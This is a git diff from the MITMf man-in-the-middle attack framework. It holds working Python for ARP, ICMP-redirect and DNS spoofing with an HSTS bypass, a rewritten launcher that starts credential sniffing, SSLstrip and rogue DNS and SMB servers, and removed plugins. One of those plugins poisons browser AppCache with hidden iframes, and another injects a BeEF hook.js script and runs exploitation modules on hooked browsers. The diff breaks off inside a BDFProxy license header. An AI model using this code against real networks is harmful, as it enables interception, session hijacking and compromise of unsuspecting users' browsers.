sendp(packet, iface=self.interface, verbose=self.debug)
class _ARP():
def __init__(self, gateway, interface, mac):
self.gateway = gateway
self.gatewaymac = getmacbyip(gateway)
self.mac = mac
self.target = None
self.targetmac = None
self.interface = interface
self.arpmode = 'req'
self.debug = False
self.send = True
self.arp_inter = 3
def start(self):
if self.gatewaymac is None:
sys.exit("[-] Error: Could not resolve gateway's MAC address")
if self.target:
self.targetmac = getmacbyip(self.target)
if self.targetmac is None:
sys.exit("[-] Error: Could not resolve target's MAC address")
if self.arpmode == 'req':
pkt = self.build_arp_req()
elif self.arpmode == 'rep':
pkt = self.build_arp_rep()
t = threading.Thread(name='arp_spoof', target=self.send_arps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def send_arps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.arp_inter, iface=interface, verbose=debug)
def stop(self):
self.send = False
sleep(3)
self.arp_inter = 1
if self.target:
print "\n[*] Re-ARPing target"
self.reARP_target(5)
print "\n[*] Re-ARPing network"
self.reARP_net(5)
def build_arp_req(self):
if self.target is None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
elif self.target:
pkt = Ether(src=self.mac, dst=self.targetmac)/\
ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target)
return pkt
def build_arp_rep(self):
if self.target is None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
elif self.target:
pkt = Ether(src=self.mac, dst=self.targetmac)/\
ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target, op=2)
return pkt
def reARP_net(self, count):
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
ARP(psrc=self.gateway, hwsrc=self.gatewaymac, op=2)
sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
def reARP_target(self, count):
pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\
ARP(psrc=self.target, hwsrc=self.targetmac, op=2)
sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface)
class _ICMP():
def __init__(self, interface, target, gateway, ip_address):
self.target = target
self.gateway = gateway
self.interface = interface
self.ip_address = ip_address
self.debug = False
self.send = True
self.icmp_interval = 2
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)
"""
class _DNS():
hsts = False
dns = False
hstscfg = None
dnscfg = None
_instance = None
nfqueue = None
queue_number = 0
def __init__(self):
self.nfqueue = NetfilterQueue()
t = threading.Thread(name='nfqueue', target=self.bind, args=())
t.setDaemon(True)
t.start()
@staticmethod
def getInstance():
if _DNS._instance is None:
_DNS._instance = _DNS()
return _DNS._instance
@staticmethod
def checkInstance():
if _DNS._instance is None:
return False
else:
return True
def bind(self):
self.nfqueue.bind(self.queue_number, self.callback)
self.nfqueue.run()
def stop(self):
try:
self.nfqueue.unbind()
except:
pass
def enableHSTS(self, config):
self.hsts = True
self.hstscfg = config
def enableDNS(self, config):
self.dns = True
self.dnscfg = config
def resolve_domain(self, domain):
try:
mitmf_logger.debug("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips
except Exception:
mitmf_logger.info("Error resolving " + domain)
def callback(self, payload):
try:
#mitmf_logger.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
return
if pkt.haslayer(DNSQR):
mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
return
payload.accept()
elif self.hsts:
if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
def modify_dns(self, payload, pkt, ip):
try:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
if self.hsts:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
for i in ip:
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
if self.dns:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
except Exception, e:
print "Exception occurred while modifying DNS: " + str(e)
"""

@ -1 +1 @@
Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

@ -1 +0,0 @@
Subproject commit 9707672de62bd42f651fabc6f9d368d7a67b4d99

@ -1 +0,0 @@
Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef

BIN
lock.ico

Binary file not shown.

Before

Width:  |  Height:  |  Size: 1.1 KiB

After

Width:  |  Height:  |  Size: 558 B

Before After
Before After

3
logs/.gitignore vendored
View file

@ -1,4 +1,5 @@
*
!.gitignore
!responder/
!dnschef/
!dns/
!ferret-ng/

2
logs/ferret-ng/.gitignore vendored Normal file
View file

@ -0,0 +1,2 @@
*
!.gitignore

260
mitmf.py
View file

@ -18,194 +18,166 @@
# USA
#
import sys
import argparse
import os
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
import argparse
import sys
import os
import threading
import core.responder.settings as settings
from argparse import RawTextHelpFormatter
from twisted.web import http
from twisted.internet import reactor
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sergioproxy.ProxyPlugins import ProxyPlugins
from core.utils import Banners
from core.utils import PrintException
from configobj import ConfigObj
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import get_if_addr, get_if_hwaddr
from core.logger import logger
from core.banners import get_banner
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
try:
import user_agents
except ImportError:
print "[-] user_agents library missing! User-Agent parsing will be disabled!"
print get_banner()
mitmf_version = "0.9.6"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
dnschef_version = "0.4"
Banners().printBanner()
mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'
if os.geteuid() != 0:
sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?")
sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename),
usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]',
epilog="Use wisely, young Padawan.",
formatter_class=RawTextHelpFormatter)
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add MITMf options
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on")
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use")
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
#added by alexander.georgiev@daloo.de
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#add sslstrip options
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins
plugins = []
try:
for p in plugin_classes:
plugins.append(p())
except:
print "Failed to load plugin class %s" % str(p)
#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
#Give subgroup to each plugin with options
try:
for p in plugins:
if p.desc == "":
sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
else:
sgroup = parser.add_argument_group("%s" % p.name, p.desc)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
options = parser.parse_args()
if p.has_opts:
p.add_options(sgroup)
except NotImplementedError:
sys.exit("[-] %s plugin claimed option support, but didn't have it." % p.name)
#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]
args = parser.parse_args()
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
try:
configfile = ConfigObj(args.configfile)
except Exception, e:
sys.exit("[-] Error parsing config file: " + str(e))
from core.netcreds import NetCreds
config_args = configfile['MITMf']['args']
if config_args:
print "[*] Loading arguments from config file"
for arg in config_args.split(' '):
sys.argv.append(arg)
args = parser.parse_args()
if options.read_pcap:
NetCreds().parse_pcap(options.read_pcap)
####################################################################################################
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface)
options.mac = get_mac(options.interface)
# Here we check for some variables that are very commonly used, and pass them down to the plugins
try:
args.ip_address = get_if_addr(args.interface)
if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
sys.exit("[-] Interface %s does not have an assigned IP address" % args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
settings.Config.populate(options)
try:
args.mac_address = get_if_hwaddr(args.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface MAC address: %s" % e)
log.debug("MITMf started: {}".format(sys.argv))
args.configfile = configfile #so we can pass the configobj down to all the plugins
#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
####################################################################################################
NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)
log_level = logging.__dict__[args.log_level.upper()]
from core.proxyplugins import ProxyPlugins
#Start logging
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
mitmf_logger = logging.getLogger('mitmf')
ProxyPlugins().all_plugins = plugins
for plugin in plugins:
fileHandler = logging.FileHandler("./logs/mitmf.log")
fileHandler.setFormatter(logFormatter)
mitmf_logger.addHandler(fileHandler)
#load only the plugins that have been called at the command line
if vars(options)[plugin.optname] is True:
#####################################################################################################
ProxyPlugins().add_plugin(plugin)
#All our options should be loaded now, pass them onto plugins
print "[*] MITMf v%s online... initializing plugins" % mitmf_version
print "|_ {} v{}".format(plugin.name, plugin.version)
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
load = []
plugin.setup_logger()
plugin.initialize(options)
for p in plugins:
if plugin.tree_info:
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
if vars(args)[p.optname] is True:
print "|_ %s v%s" % (p.name, p.version)
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
p.tree_output.remove(line)
plugin.start_config_watch()
if getattr(args, p.optname):
p.initialize(args)
load.append(p)
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
print "|_ PacketFilter online"
for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
try:
pfilter.start()
except KeyboardInterrupt:
pfilter.stop()
shutdown()
if vars(args)[p.optname] is True:
if hasattr(p, 'tree_output') and p.tree_output:
for line in p.tree_output:
print "| |_ %s" % line
#Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
from libs.dnschef.dnschef import DNSChef
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver'])
URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port'])
DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS'])
if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on':
DNSChef.getInstance().startTCP()
else:
DNSChef.getInstance().startUDP()
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(options.listen_port, strippingFactory)
reactor.listenTCP(args.listen, strippingFactory)
for plugin in plugins:
if vars(options)[plugin.optname] is True:
plugin.reactor(strippingFactory)
#load custom reactor options for plugins that have the 'plugin_reactor' attribute
for p in plugins:
if getattr(args, p.optname):
if hasattr(p, 'plugin_reactor'):
p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
#Start mitmf-api
from core.mitmfapi import mitmfapi
print "|"
print "|_ Sergio-Proxy v%s online" % sergio_version
print "|_ SSLstrip v%s by Moxie Marlinspike online" % sslstrip_version
print "|_ DNSChef v%s online\n" % dnschef_version
print "|_ MITMf-API online"
mitmfapi().start()
reactor.run()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#run each plugins finish() on exit
for p in load:
p.finish()
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.run()
print "\n"
shutdown()

View file

@ -1,208 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
import logging
import re
import os.path
import time
import sys
from plugins.plugin import Plugin
from datetime import date
from core.sslstrip.URLMonitor import URLMonitor
mitmf_logger = logging.getLogger('mitmf')
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
implements = ["handleResponse"]
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance()
self.urlMonitor.setAppCachePoisoning()
try:
self.config = options.configfile['AppCachePoison']
except Exception, e:
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
def handleResponse(self, request, data):
url = request.client.uri
req_headers = request.client.getAllHeaders()
headers = request.client.responseHeaders
ip = request.client.getClientIP()
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
return {'request': request, 'data': data}
urls = self.urlMonitor.getRedirectionSet(url)
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
(name,s,element,url) = self.getSectionForUrls(urls)
if s is False:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data}
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
p = self.getTemplatePrefix(s)
if element == 'tamper':
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
mitmf_logger.info("%s Poisoning manifest URL" % ip)
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
mitmf_logger.info("%s Poisoning raw URL" % ip)
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return {'request': request, 'data': data}
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
name = i
if section.get('tamper_url',False) == url:
return (name, section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (name, section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (name, section, 'manifest',url)
if section.get('raw_url',False) == url:
return (name, section, 'raw',url)
return (None, False,'',urls.copy().pop())

View file

@ -1,137 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from core.beefapi.beefapi import BeefAPI
from plugins.plugin import Plugin
from plugins.Inject import Inject
from time import sleep
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
requests_log.setLevel(logging.WARNING)
mitmf_logger = logging.getLogger('mitmf')
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
tree_output = []
depends = ["Inject"]
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = options.ip_address
try:
beefconfig = options.configfile['MITMf']['BeEF']
except Exception, e:
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
try:
userconfig = options.configfile['BeEFAutorun']
except Exception, e:
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
self.Targeted_modules = userconfig["targets"]
Inject.initialize(self, options)
self.black_ips = []
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.ip_address, beefconfig['beefport'])
beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
sys.exit("[-] Error logging in to BeEF!")
self.tree_output.append("Mode: %s" % self.Mode)
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
t.setDaemon(True)
t.start()
def autorun(self, beef):
already_ran = []
already_hooked = []
while True:
sessions = beef.sessions_online()
if (sessions is not None and len(sessions) > 0):
for session in sessions:
if session not in already_hooked:
info = beef.hook_info(session)
mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
self.black_ips.append(str(info['ip']))
if self.Mode == 'oneshot':
if session not in already_ran:
self.execModules(session, beef)
already_ran.append(session)
elif self.Mode == 'loop':
self.execModules(session, beef)
sleep(10)
else:
sleep(1)
def execModules(self, session, beef):
session_info = beef.hook_info(session)
session_ip = session_info['ip']
hook_browser = session_info['name']
hook_os = session_info['os']
if len(self.All_modules) > 0:
mitmf_logger.info("%s >> sending generic modules" % session_ip)
for module, options in self.All_modules.iteritems():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)
mitmf_logger.info("%s >> sending targeted modules" % session_ip)
for os in self.Targeted_modules:
if (os in hook_os) or (os == hook_os):
browsers = self.Targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
modules = self.Targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.iteritems():
mod_id = beef.module_id(module)
resp = beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
else:
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
sleep(0.5)

File diff suppressed because one or more lines are too long

View file

@ -1,46 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from plugins.plugin import Plugin
class CacheKill(Plugin):
name = "CacheKill"
optname = "cachekill"
desc = "Kills page caching by modifying headers"
implements = ["handleHeader", "connectionMade"]
bad_headers = ['if-none-match', 'if-modified-since']
version = "0.1"
has_opts = True
def add_options(self, options):
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
def handleHeader(self, request, key, value):
'''Handles all response headers'''
request.client.headers['Expires'] = "0"
request.client.headers['Cache-Control'] = "no-cache"
def connectionMade(self, request):
'''Handles outgoing request'''
request.headers['Pragma'] = 'no-cache'
for h in self.bad_headers:
if h in request.headers:
request.headers[h] = ""

View file

@ -1,607 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
